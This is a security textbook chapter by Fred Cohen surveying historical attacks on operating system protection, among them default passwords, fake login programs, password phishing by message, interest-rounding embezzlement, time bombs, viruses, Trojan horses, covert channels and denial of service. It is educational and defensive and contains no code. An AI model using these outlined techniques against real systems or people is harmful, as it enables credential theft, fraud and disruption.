3.2 - Typical Attacks on OS Protection

3.2 - Typical Attacks on OS Protection

Copyright(c), 1990, 1995 Fred Cohen - All Rights Reserved

If an OS is based on an appropriate policy, is well written, has no errors, is properly applied, maintained, and operated, and properly tolerates hardware failures, OS protection may be very effective. When any of these conditions break down, things fall apart quickly. As an example, in MVS, a very popular and old operating system for large mainframe computer systems, maintaining proper OS protection requires that at least 15 independent subsystems be properly maintained. Each subsystem changes with time, because there are literally thousands of users accessing such a system at any given time, hundreds of programmers changing software in the system monthly upgrades from various software suppliers, and changes in the authorizations of users using the system. A single bit error in any of these 15 subsystems will cause the entire computer system to become insecure. It should not be surprising to hear that in a recent study performed by a major accounting firm, over 80% of these systems in business use were found to have improper controls in place. In a recent GAO study, over 90% of the military and government computers using this system were found to have the same problem.

With this as background, we will now review some examples of how OSs have been attacked in the past. Many of the following examples are derived from [Linde75] , [Lampson73] , [Ritche82] , and [Reid83] .

Many users are relatively unaware of protection provisions in systems they use. In a typical undergraduate computer science program, less than 15 minutes are spent on the topic of information protection, and that time is spent in discussing the way memory is allocated to processes to prevent accidental conflicts. Computer knowledgeable students often find assignments, exams, and their solutions unprotected by professors because of the professors' lack of knowledge. This problem is compounded in universities by the fact that most computer systems are operated by students who are given accounts with access to all of the information on the system, and asked to perform administrative functions at night and on weekends when no supervision is available. It is like putting the keys in the ignition and leaving the door unlocked. Even an honest student would have a hard time resisting this temptation.

The same problems abound in industry. A newly hired computer operator with only a few hours worth of training who is willing to work midnight shift on a weekend is typically left alone in the building with an account allowing full access to all information. It is very easy to get such a job in most companies, and the amount of damage that can be done is truly astounding.

Most systems are set up with inadequate default protection. A typical system is delivered with standard passwords for a large list of maintenance and administration accounts, any of which can examine or modify all of the information is entered by a knowledgeable attacker. In several cases, hundreds of computers were enterred this way by a single perpetrator, including systems throughout an international NASA network, DOD computers, industrial systems, systems maintaining patient treatment data in hospitals, and educational computers storing grading information.

In many cases, system administrators, either through lack of knowledge or poor judgment, allow attacks that are easily prevented. Many systems allow the systems administrator to set default protections, but this is rarely done because the adminstrative tools do not support this activity. Most administrators aren't even aware of what is happenning on their systems. Over a two week period in one medium sized computer center, 5 independent cases of attacks were reported to a research team. The computer center only knew about one of them, and they were quite embarrassed to find out that the researchers knew of it.

Even in the most aware organizations where a substantial effort is made to defend against attacks, it is a rare stroke of luck when an attack is detected. In one widely publicized case, AT+T managed to track down an attacker that had been accessing hundreds of computers over a period of several years. The attack was detected by a systems administrator who was working at night and happenned to notice someone else logged in. He checked on this because he didn't think this person would normally work at such hours, and found that there was an attack underway. AT+T has one of the most extensive systems administrator training programs in the industry, has required computer security training for all employees, and is a leader in the developement of secure systems.

Tracing down the attacker is usually very hard without a great deal of expertise, and usually requires that the attacker attack repetedly over a long period of time. It took AT+T several years to detect the attack, access to telephone system information that most businesses do not have, and hundreds of thousands of dollars to catch this attacker. Without a Herculean effort by systems administrators, modern systems cannot be maintained with a reasonable degree of protection.

In many OSs it is possible for users to cause errors that grant access to instructions or data normally only accessible by the OS. Once this access has been granted, any data in the computer can usually be accessed, and portions of the OS may be modified to allow ongoing attacks without detection. Because of the complexity of modern OSs, it is not feasible to assure that such loopholes do not exist. The clever attacker can get by nearly any modern OS in this way.

There are many other less disastrous errors that can allow successful attacks on part of a system's information with or without detection. A large amount of expertise is often required for worst case attacks. This is sometimes seen as a good reason to assure that the personnel with the greatest access (operators and maintenance people) have the least knowledge of how to abuse the system. This perspective is clearly invalidated by a wealth of historical data.

Sometimes hardware errors can result from software instructions As an example, the early versions of the Radio Shack TRS-80 could be permanently destroyed with a simple 2 instruction program. The IBM PC had an error in an arithmetic instruction which caused wrong answers in floating point calculations. The IBM 360 used to have an instruction which caused the entire machine to power down, often causing permanent failures. This were all left unprotected by the OS at one point.

In at least one case, a computer operator took orders issued by his supervisor through electronic mail. Since the electronic mail system was not secure at this installation, it was possible for any user to append data to the operator's incoming mail file. If the data was formatted correctly, there was no way to tell legitimate mail from a forgery. After several mysterious system crashes and file losses, the supervisor called the operator into his office to find out what was going on. The operator said that he was just following the supervisor's instructions, and that he could prove it! He logged into the system, and showed the surprised supervisor the forged messages.

One type of electronic embezzlement that has been successfully carried off many times, involves a programmer who handles interest determination on bank accounts. In calculating the interest using a digital computer, there is nearly always some error in the last bit. The programmer need only determine the error and channel it to a personal account. Since the books always balance, no apparent embezzlement is taking place. The bank is merely losing the small difference it would otherwise make on the error in computing interest. This small difference happens millions of times a day, and tens of millions of dollars have been taken this way. Please note that when the money is not taken by embezzlement, the bank gets it. This practice is seen as unfair by many.

A common technique is to gain control over a large number of terminals either by logging in on them or by requesting control over them from the OS. Once in control, it is quite easy to have a program act as if it were the system's standard login program, and listen for user identifications and passwords. The spoofing program typically acts as if the system isn't accepting users at this time, or reports a wrong password and releases control to the operating system for the next try. In several experiments, this technique succeeded in gaining full access to a system every time. Attack times depend on how often users login.

Another common technique is to observe the part of the OS where input and output are stored before processing. By watching these "I/O buffers", all input and output may be observed. This is just like tapping a phone line. Most OSs protect against this simple attack, but few protect against hardware devices with direct access to the computer's memory. They can often be programmed by any user to examine or modify any memory location in the processor.

A series of attacks were made on users of a computer system by a user posing as the system operator and sending other users messages indicating that their password was needed in order to prevent loss of their files or in order to allow the user access to some new system facility. Because of a lack of user education, many naive users fell victim. The installation now issues written warnings about such problems and has signs on every door to help educate users about this problem. The attacker could have been caught with relative ease if a sufficiently knowledgeable expert were attacked, but apparently only the ignorant were chosen for these attacks.

A common OS related attack involves theft from system backup tapes. Since these tapes are often less protected than the systems they backup, they are an easy target for attack. As an example, changing a tape label can often be done in a second on a casual tour of a facility. This tape can then be read by the attacker at will or removed from the tape library for in depth examination at another site.

Many OSs designers leave 'back doors', methods by which the designer is able to penetrate the system without legitimate access. They are usually hard to find even with a copy of the OS source and the time to look for attacks. This practice is a terrible threat to OS protection in the same way as a secret way of decrypting messages is a terrible threat to cryptosystems. The current trend of not releasing source code makes this far more difficult to uncover.

One of the most creative attacks using a peripheral device is the "terminal gone awry". It is a bit complicated, but here we go.

This attack can be launched with electronic mail, with any program run by another user, and in some cases with system generated error messages.

In most computer systems, IO lines are not immediately disconnected when a telephone call is terminated, it almost always takes a few thousandths of a second, and if configured improperly, can remain available indefinately. Users often hang up the phone without logging out, and a call taking place immediately thereafter ends up logged into the same account. In one case, a class demonstration involving three computers was underway; a PC, a computer connected to an external telephone system, and a remote computer across the US. The class was somewhat surprised to find out that in connecting from the PC to the local computer, the line was left logged into another user's account. It was explained that this happens every so often, and that it is a terrible problem. The real surprise happened when the long distance across the US was made. This line too was logged into an account on the remote machine. It took quite a while to convince the group that this was not planned.

Denial of services attacks take many different forms. Filling disk space is possible on many systems where allocations are not available or properly used. Spawning many large processes can often reduce performance for other users. Using all of the magnetic tapes often makes other users wait. On the PDP-10, an indirect jump could involve any number of indirections, and at one time was treated as a single uninterruptable instruction. By making a loop of pointers, a user could completely halt all other processing until the system was reinitialized.

A typical attack on a "virtual memory system" demonstrates the difficulty in eliminating denial of service attacks. Virtual memory is a way of letting users act as if the internal memory of a computer is very large, even though the physical internal memory is very small. It does this by storing portions of memory on a disk or other storage device until it is required for processing. Information is removed from physical memory to make room for other users. Normally, such a system keeps many of the most recently used pages from each user in memory, but an attacker can fool the system into kicking everyone else out of memory by using large numbers of different pages in rapid succession. Each time this process runs, all other processes are forced out onto the disk and back again. since disk is far slower than internal memory, this causes the system to slow considerably, often by a factor of 100 or more.

"Time bombs" are used fairly frequently by programmers to prevent the use of a system after some date, or when the programmer becomes dissatisfied with other factors. A time bomb is any time triggered program effect. Many consultants include time bombs in programs to assure that they get paid. If checks bounce, the system self destructs. Any set of conditions in the computer can be easily used to trigger implanted attacks of this sort.

The virus attack [Cohen84-2] [Cohen86-2] is based on introducing a diseased program into an environment either via trojan horse or other methods. The diseased program "P" uses the privileges of the user using it "U" to grant the creator of the virus "C" all access rights of U, and to spread its disease to all of U's executable programs. Once U is infected, any other user using any of U's programs becomes infected, and so forth. An initial study showed that with a simple virus of this sort, a computer system was completely taken over (all privileges of all users were granted to C) in 1/2 hour (average of 5 attacks). The initial user in the study had no special privileges, and only used the virus in a very limited way to assure that infection was limited and easily traced. Even the system administrators who knew that this program was going to be run were compromised easily. The situation with viruses is so bad that many systems throughout the world have been seriously damaged, and new laws have been introduced to make the use of computer viruses illegal.

The "Trojan horse" attack is perhaps the most common advanced attack in use today. Like the original Trojan horse, this attack involves implanting an unadvertised function in a program. The corrupt program is then given to other users. After they install it, the problems begin. In the simplest case, every user that runs the program is compromised. One such program was put on a system by a normal user and announced over the system bulletin board. Within 60 seconds, a system administrator tried the program and gave full access to every aspect of the computer to the attacker. In a controlled experiment, it was found that this attack gained full access to about 10% of the users of a system 90% of the time, and full access to the entire computer system the remaining 10% of the time.

Trojan horses present substantial problems to nearly every OS, primarily because there is no method to assure that no Trojan horses are present. Under current theory, we can prove that a program does what it is supposed to (called sufficiency), but we cannot prove that it does nothing more (called necessity).

Many "secure" retrofits of OSs fail due to unspecified system calls or system calls using unexpected parameters. A typical example is was system call in a CDC OS that, when given an illegal value, allowed access to memory that the user was not supposed to be allowed to access. Checking calling values to system routines is an important aspect of OS implementation, but it doesn't guarantee protection.

A common problem comes from the allocation of previously used space without first erasing it. If it previously contained information that was not to be released to the new owner of the space, the data could be leaked. In the case of magnetic tapes, preventing this can be quite time consuming, and doesn't guarantee that the data will be unreadable. Demonstrations have been given where data from erased disks and tapes is read repeatedly until the information that was once stored on them reappears in the form of non uniform probabilities of values.

Covert channels are possible in every timesharing OS, and it has been shown impossible to completely eliminate this problem whenever resources are shared in a non-fixed fashion. A typical example is the use of disk space to indicate a condition, but any storage or timing information on shared media can be used for this purpose. The classic example is the filling of the disk to indicate a 1, and the removal of this condition to indicate a 0. Shannon's information theory [Shannon48] shows that this can be used to send an arbitrary quantity of information with an arbitrary reliability, given sufficient time.

Most OSs don't take adequate measures to assure protection on resources that are dismountable. A typical attack is to request the use of a tape with write access, when only read access should be allowed. Most OSs don't have sufficient protection to prevent this attack if the operator fails to catch the mistake, and very few systems prevent malicious operators from taking actions that cause harm. During maintenance, this is a particularly important problem, since the hardware itself becomes open to inspection and modification.

Almost no OS is able to handle attacks that depend on the timing of interrupts. An interrupt is usually caused when a physical peripheral device electronically notifies the computer that it has fulfilled a request, or is ready to fulfill a request. In many cases, interrupts must be handled within a few miliseconds or the device will not work properly. Because interrupts can occur at any time, there may be a very large number of interrupt sequences and extremely complex interdependencies between interrupt states. In most systems there is some sequence of interrupts that causes a system security failure. Because of the large number of possible sequences, it is impossible to fully test interrupt routines. Many systems allow systematic exercising of these routines, and when one eventually makes a sufficiently damaging error, it is often possible to take advantage of the error to attain rights that should not be granted to the attacker.

At one small computer conference, there were 5 "secure" OS products for a microcomputer based computer system being demonstrated by competing companies, all of them claiming to be impenetrable. In under 4 hours, they had all fallen to attack by a user who had no experience with their operation, and no special information about how they worked prior to this demonstration, using only techniques authorized to the least trusted class of users they supported.

In many cases, correcting known errors can introduce new errors. A typical example is the recurring problem of receiving a higher priority interrupt when processing a lower priority interrupt. The standard technique for resolving this problem is the use of a memory area to store lower priority interrupt information while processing higher priority interrupts. In high utilization periods, there may be cases where the number of interrupts are so high that the system runs out of space to store lower priority interrupts, thus causing a system failure. The solution is to make more space available for storing these interrupts, but as we use more and more space for the system, we leave less and less space for the user. In this case, some of the user programs could not run any more because there wasn't enough space left. Plugging the hole only openned up a new leak.

These represent only a small sampling of the attacks that have proven successful against systems that were thought by their designers to be very secure. In most cases, the OSs had evolved over many years, with every known protection flaw being repaired to the best of the designers' abilities. In fact, efforts to plug leaks often result in the creation of new leaks. These systems range from those built by the largest computer company in the world, to those thought designed by small development firms. The point should be clear that protection cannot be attained by ad-hoc methods or by trying to plug a leaky sieve.